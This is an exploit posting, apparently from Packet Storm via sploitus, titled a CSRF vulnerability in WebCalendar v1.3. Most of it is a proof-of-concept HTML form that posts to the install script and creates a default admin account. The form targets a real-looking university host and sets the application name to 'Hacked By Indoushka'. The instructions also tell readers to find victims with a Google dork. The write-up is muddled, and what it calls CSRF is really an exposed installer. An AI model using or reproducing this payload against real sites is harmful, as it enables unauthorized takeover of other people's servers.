Share
## https://sploitus.com/exploit?id=PACKETSTORM:173935
====================================================================================================================================  
| # Title : WebCalendar v1.3 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |   
| # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip |   
| # Dork : WebCalendar v1.3 |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 173.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : install/index.php.  
  
[+] http://127.0.0.1/q7.3/admin/settings.php.  
  
[+] save code as poc.html .  
  
[+] <?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  
"DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  
<head>  
<title>WebCalendar Setup Wizard</title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />  
<script>  
<!-- <![CDATA[  
var xlate = [];  
xlate['invalidColor'] = 'Invalid Color';  
  
function testPHPInfo() {  
var url = "index.php?action=phpinfo";  
  
window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );  
}  
function validate( form ) {  
// Only check to make sure single-user login is specified  
// if in single-user mode.  
var  
err = '',  
form = document.form_app_settings,  
listid = 0; // Find id of single user object.  
  
for( i = 0; i < form.form_user_inc.length; i++ ) {  
if( form.form_user_inc.options[i].value == 'none' )  
listid = i;  
}  
if( form.form_user_inc.options[listid].selected ) {  
if( form.form_single_user_login.value.length == 0 ) {  
// No single user login specified.  
alert( 'Error: You must specify a\nSingle-User Login.' );  
form.form_single_user_login.focus();  
return false;  
}  
}  
if( form.form_server_url.value == '' ) {  
err += "Server URL is required.\n";  
form.form_server_url.select();  
form.form_server_url.focus();  
}  
else if( form.form_server_url.value.charAt(  
form.form_server_url.value.length - 1 ) != '/' ) {  
err += "Server URL must end with a slash(/).\n";  
form.form_server_url.select();  
form.form_server_url.focus();  
}  
if( err != '' ) {  
alert( "Error:\n\n" + err );  
return false;  
}  
// Submit form...  
form.submit();  
}  
function auth_handler() {  
var  
form = document.form_app_settings,  
listid = 0; // Find id of single user object.  
for( i = 0; i < form.form_user_inc.length; i++ ) {  
if( form.form_user_inc.options[i].value == 'none' )  
listid = i;  
}  
if( form.form_user_inc.options[listid].selected ) {  
makeVisible( 'singleuser' );  
} else {  
makeInvisible( 'singleuser' );  
}  
}  
function db_type_handler() {  
var  
form = document.dbform,  
listid = 0,  
selectvalue = form.form_db_type.value;  
  
if( selectvalue == 'sqlite' || $db_type == 'sqlite3'  
|| selectvalue == 'ibase' ) {  
form.form_db_database.size = 65;  
document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';  
} else {  
form.form_db_database.size = 20;  
document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';  
}  
}  
function chkPassword() {  
var  
form = document.dbform,  
db_pass = form.form_db_password.value,  
illegalChars = /\#/;  
// Do not allow #.../\#/ would stop all non-alphanumeric.  
  
if( illegalChars.test( db_pass ) ) {  
alert( 'The password contains illegal characters.' );  
form.form_db_password.select();  
form.form_db_password.focus();  
return false;  
}  
}  
//]]> -->  
</script>  
<script src="../includes/js/visible.js"></script>  
<style>  
body {  
margin:0;  
background:#fff;  
font-family:Arial, Helvetica, sans-serif;  
}  
table {  
border:0;  
}  
th.header,  
th.pageheader,  
th.redheader {  
background:#eee;  
}  
th.pageheader {  
padding:10px;  
font-size:18px;  
}  
th.header,  
th.redheader {  
font-size:14px;  
}  
th.redheader,  
.notrecommended {  
color:red;  
}  
td {  
padding:5px;  
}  
td.prompt,  
td.subprompt {  
padding-right:20px;  
font-weight:bold;  
}  
td.subprompt {  
font-size:12px;  
}  
div.nav {  
margin:0;  
border-bottom:1px solid #000;  
}  
div.main {  
margin:10px;  
}  
li {  
margin-top:10px;  
}  
doc.li {  
margin-top:5px;  
}  
.recommended {  
color:green;  
}  
</style>  
</head>  
<body onload="auth_handler();">  
<table border="1" width="90%" class="aligncenter">  
<th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>  
<tr>  
<td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>  
</tr>  
<th class="header" colspan="2">Application Settings</th>  
<tr>  
<td colspan="2">  
<ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>  
</td>  
</tr>  
<tr>  
<td>  
<table width="75%" class="aligncenter">  
<tr>  
<form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">  
<input type="hidden" name="app_settings" value="1" />  
<td class="prompt">Create Default Admin Account:</td>  
<td>  
<input type="checkbox" name="load_admin" value="Yes" />  
<span class="notrecommended"> (Admin Account Not Found)</span>  
</td>  
</tr>  
<tr>  
<td class="prompt">Application Name:</td>  
<td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>  
</tr>  
<tr>  
<td class="prompt">Server URL:</td>  
<td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>  
</tr>  
<tr>  
<td class="prompt">User Authentication:</td>  
<td>  
<select name="form_user_inc" onChange="auth_handler()">  
<option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>  
<option value="http">Web Server (not detected)</option>  
<option value="user-imap.php">IMAP</option>  
<option value="none" >None (Single-User)</option>  
</select>  
</td>  
</tr>  
<tr id="singleuser">  
<td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>  
<td><input name="form_single_user_login" size="20" value="" /></td>  
</tr>  
<tr>  
<td class="prompt">Read-Only:</td>  
<td>  
<input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;  
<input name="form_readonly" value="false" type="radio" checked="checked" />No  
</td>  
</tr>  
<tr>  
<td class="prompt">Environment:</td>  
<td>  
<select name="form_mode">  
<option value="prod" selected="selected">Production</option>  
<option value="dev">Development</option>  
</select>  
</td>  
</tr>  
</table>  
</td>  
</tr>  
</table>  
<table width="80%" class="aligncenter">  
<tr>  
<td class="aligncenter">  
<input name="action" type="button" value="Save Settings" onClick="return validate();" />  
<input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />  
</form>  
</td>  
</tr>  
</table> </body>  
</html>  
  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================